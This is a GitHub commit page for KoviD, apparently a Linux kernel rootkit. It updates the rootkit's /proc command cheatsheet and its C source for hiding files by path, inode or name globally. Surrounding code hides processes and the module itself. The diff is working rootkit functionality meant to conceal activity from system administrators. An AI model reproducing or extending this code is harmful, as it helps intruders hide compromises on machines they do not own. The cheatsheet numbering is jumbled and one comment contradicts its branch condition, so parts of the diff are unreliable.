Skip to content

Commit

Permalink
Merge pull request #110 from carloslack/kvdev
Browse files Browse the repository at this point in the history
Kvdev
  • Loading branch information
carloslack authored Oct 2, 2024
2 parents 61daa7f + ebc05c9 commit 08ec90f
Show file tree
Hide file tree
Showing 3 changed files with 59 additions and 46 deletions.
26 changes: 17 additions & 9 deletions docs/cheatsheet-proc-interface.txt
Original file line number Diff line number Diff line change
Expand Up @@ -33,30 +33,38 @@
$ echo "-s" >/proc/test
$ dmesg

#11 Hide README.txt by inode number from current directory
$ echo "-a AAA `stat -c %i README.txt`" >/proc/test
#11 Hide README.txt
# At current directory only
$ echo "-a README.txt" >/proc/test
# At full-path
$ echo "-a /home/files/README.txt" >/proc/test

#12 Hide ALL files named README.txt - this bypass #11
#11 Hide README.txt globally - hide all instances of README.txt
# bypass #10 and #11
$ echo "-g README.txt" >/proc/test


#13 Hide ALL files named README.txt - this bypass #11
$ echo "-a README.txt" >/proc/test

#13 Undo #12 - this bypass #11
#14 Undo #12 - this bypass #11
$ echo "-d README.txt" >/proc/test

#14 List hidden tasks - debug mode only
#15 List hidden tasks - debug mode only
$ echo "-s" >/proc/test
$ dmesg

#14 List hidden files and directories - debug mode only
#16 List hidden files and directories - debug mode only
$ echo "-l" >/proc/test
$ dmesg

#15 Mark tty log file to be removed when KoviD is rmmod'ed
#17 Mark tty log file to be removed when KoviD is rmmod'ed
$ echo "-t0" >/proc/test

#16 Undo #15
#18 Undo #15
$ echo "-t1" >/proc/test

#17 Fetch the base address of a running process by PID number
#19 Fetch the base address of a running process by PID number
$ echo "-b <PID>">/proc/kv
$ cat /proc/kv

Expand Down
53 changes: 29 additions & 24 deletions src/kovid.c
Original file line number Diff line number Diff line change
Expand Up @@ -22,6 +22,7 @@
#include <linux/tcp.h>
#include <linux/kthread.h>
#include <linux/kernel.h>
#include <linux/namei.h>

#include "lkm.h"
#include "fs.h"
Expand Down Expand Up @@ -476,7 +477,7 @@ static ssize_t write_cb(struct file *fptr, const char __user *user,
} else {
kv_hide_task_by_pid(val, 1, CHILDREN);
}
/* hide kovid module */
/* hide kovid module */
} else if(!strcmp(buf, "-h") && !op_lock) {
static unsigned int msg_lock = 0;
if(!msg_lock) {
Expand All @@ -490,33 +491,37 @@ static ssize_t write_cb(struct file *fptr, const char __user *user,
/* list hidden tasks */
} else if(!strcmp(buf, "-s")) {
kv_show_saved_tasks();
/* add name to the list of hidden files/directories
* and inode, is present.
* */
/* hide file/directory based on inode */
} else if(!strncmp(buf, "-a", MIN(2, size))) {
int ino = 0;
char *s = &buf[3];
char *number_str;
const char *tmp[] = {NULL, NULL};
int ok = 1;

s[strcspn(s, "\n")] = 0;

// Find the first space in the input to separate name and number
number_str = strchr(s, ' ');
if (number_str) {
*number_str++ = '\0';
} else {
number_str = "";
struct kstat stat;
struct path path;

if (!kern_path(s, LOOKUP_FOLLOW, &path)) {
if (!vfs_getattr(&path, &stat, STATX_BASIC_STATS, AT_STATX_SYNC_AS_STAT)) {
if (*s != '/') {
/** It is a full path */
tmp[0] = s;
fs_add_name_rw(tmp, stat.ino);
} else {
/** It is filename, no problem because we have path.dentry */
const char *f = kstrdup(path.dentry->d_name.name, GFP_KERNEL);
path_put(&path);
tmp[0] = f;
fs_add_name_rw(tmp, stat.ino);
kv_mem_free(&f);
}
}
}
/* hide file/directory globally */
} else if(!strncmp(buf, "-g", MIN(2, size))) {
char *s = &buf[3];
s[strcspn(s, " ")] = 0;
if (strlen(s)) {
const char *tmp[] = {s,NULL};
fs_add_name_rw(tmp, 0);
}

*tmp = s;
if (*number_str)
ok = !kstrtoint(number_str, 10, &ino);

if (ok)
fs_add_name_rw(tmp, ino);
/* unhide file/directory */
} else if(!strncmp(buf, "-d", MIN(2, size))) {
char *s = &buf[3];
s[strcspn(s, " ")] = 0;
Expand Down
26 changes: 13 additions & 13 deletions src/lkm.h
Original file line number Diff line number Diff line change
Expand Up @@ -25,19 +25,19 @@
#define prerr_once(fmt, ...) pr_err_once(fmt, ##__VA_ARGS__);

#else
#define prinfo(fmt, ...)
#define prwarn(fmt, ...)
#define premerg(fmt, ...)
#define pralert(fmt, ...)
#define prcrit(fmt, ...)
#define prnotice(fmt, ...)
#define prerr(fmt, ...)
#define prwarn_ratelimited(fmt, ...);
#define prinfo_ratelimited(fmt, ...);
#define prerr_ratelimited(fmt, ...);
#define prinfo_once(fmt, ...);
#define prwarn_once(fmt, ...);
#define prerr_once(fmt, ...);
#define prinfo(fmt, ...) do {} while (0)
#define prwarn(fmt, ...) do {} while (0)
#define premerg(fmt, ...) do {} while (0)
#define pralert(fmt, ...) do {} while (0)
#define prcrit(fmt, ...) do {} while (0)
#define prnotice(fmt, ...) do {} while (0)
#define prerr(fmt, ...) do {} while (0)
#define prwarn_ratelimited(fmt, ...) do {} while (0)
#define prinfo_ratelimited(fmt, ...) do {} while (0)
#define prerr_ratelimited(fmt, ...) do {} while (0)
#define prinfo_once(fmt, ...) do {} while (0)
#define prwarn_once(fmt, ...) do {} while (0)
#define prerr_once(fmt, ...) do {} while (0)
#endif

#define EXIT_UNHIDE 1
Expand Down

0 comments on commit 08ec90f

Please sign in to comment.